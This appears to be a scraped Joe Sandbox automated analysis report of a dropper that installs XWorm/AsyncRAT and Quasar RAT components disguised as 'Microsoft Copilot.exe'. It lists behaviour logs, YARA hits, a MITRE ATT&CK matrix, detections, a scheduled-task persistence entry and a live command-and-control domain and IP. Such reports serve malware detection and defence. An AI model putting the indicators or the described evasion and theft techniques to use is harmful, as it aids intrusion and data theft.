                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Copilot.exe, 00000001.00000002.2513107629.000000001BB36000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2498539395.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2513107629.000000001BA78000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2498539395.0000000000E66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Yara detected XWorm
                    Source: Yara matchFile source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PixpFUv4G7.exe PID: 344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Copilot.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Yara detected XWorm
                    Source: Yara matchFile source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PixpFUv4G7.exe PID: 344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Copilot.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory24
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		Security Account Manager541
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		Login Hook21
                    Registry Run Keys / Startup Folder                    		22
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts1
                    PowerShell                    		Network Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527486 Sample: PixpFUv4G7.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 62 ip-api.com 2->62 64 content-portion.gl.at.ply.gg 2->64 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 19 other signatures 2->76 9 PixpFUv4G7.exe 3 3 2->9         started        13 Microsoft Copilot.exe 2->13         started        15 Microsoft Copilot.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Copilot.exe, PE32 9->52 dropped 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->86 19 unarchiver.exe 4 9->19         started        21 Copilot.exe 15 6 9->21         started        signatures6 process7 dnsIp8 26 7za.exe 59 19->26         started        66 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 21->66 68 content-portion.gl.at.ply.gg 147.185.221.21, 47900, 49971, 49973 SALSGIVERUS United States 21->68 50 C:\Users\user\...\Microsoft Copilot.exe, PE32 21->50 dropped 78 Antivirus detection for dropped file 21->78 80 Multi AV Scanner detection for dropped file 21->80 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->82 84 6 other signatures 21->84 29 powershell.exe 23 21->29         started        32 powershell.exe 23 21->32         started        34 powershell.exe 21->34         started        36 2 other processes 21->36 file9 signatures10 process11 file12 54 C:\Users\user\AppData\...\protobuf-net.dll, PE32 26->54 dropped 56 C:\Users\user\AppData\Local\...\client.bin, PE32 26->56 dropped 58 C:\Users\user\...\Quasar.resources.dll, PE32 26->58 dropped 60 20 other files (19 malicious) 26->60 dropped 38 conhost.exe 26->38         started        88 Loading BitLocker PowerShell Module 29->88 40 conhost.exe 29->40         started        42 conhost.exe 32->42         started        44 conhost.exe 34->44         started        46 conhost.exe 36->46         started        48 conhost.exe 36->48         started        signatures13 process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PixpFUv4G7.exe71%ReversingLabsWin32.Dropper.Dapato
                    PixpFUv4G7.exe100%AviraTR/Dropper.Gen
                    PixpFUv4G7.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\Copilot.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Copilot.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Copilot.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe53%ReversingLabsWin32.Backdoor.Quasar
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll79%ReversingLabsByteCode-MSIL.Trojan.QuasarRAT
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin73%ReversingLabsByteCode-MSIL.Backdoor.Quasar
                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    content-portion.gl.at.ply.gg
                    		147.185.221.21
                    		truetrue
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        content-portion.gl.at.ply.ggtrue
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/client.bin.4.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354client.bin.4.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp, Open.Nat.dll.4.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://github.com/lontivero/Open.Nat/issuesOAlsoOpen.Nat.dll.4.drfalse
                              		unknown
                              http://www.microsoft.copowershell.exe, 00000010.00000002.1461828423.00000218A3D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1463069808.00000218A3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1850332223.00000205D1B7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1846070427.00000205D1980000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/Open.Nat.dll.4.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crl.mipowershell.exe, 00000013.00000002.1629544454.00000204C320A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crl.mpowershell.exe, 00000015.00000002.1843224693.00000205D189C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://ion=v4.5powershell.exe, 00000013.00000002.1637714732.00000204C340C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://stackoverflow.com/q/11564914/23354;client.bin.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://stackoverflow.com/q/2152978/23354sCannotclient.bin.4.drfalse
                                          		unknown
                                          https://ipwho.is/client.bin.4.drfalse
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCopilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://github.com/novotnyllc/bc-csharpBouncyCastle.Crypto.dll.4.drfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.95.112.1
                                              		ip-api.comUnited States
                                              		53334TUT-ASUStrue
                                              147.185.221.21
                                              		content-portion.gl.at.ply.ggUnited States
                                              		12087SALSGIVERUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1527486
                                              Start date and time:2024-10-07 00:52:13 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 13s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PixpFUv4G7.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@27/74@2/2
                                              EGA Information:
                                              • Successful, ratio: 27.3%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 152
                                              • Number of non-executed functions: 2
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target Microsoft Copilot.exe, PID 2044 because it is empty
                                              • Execution Graph export aborted for target Microsoft Copilot.exe, PID 3088 because it is empty
                                              • Execution Graph export aborted for target Microsoft Copilot.exe, PID 4008 because it is empty
                                              • Execution Graph export aborted for target Microsoft Copilot.exe, PID 5784 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7488 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8028 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: PixpFUv4G7.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              02:35:11Task SchedulerRun new task: Microsoft Copilot path: C:\Users\user~1\AppData\Local\Temp\Microsoft s>Copilot.exe
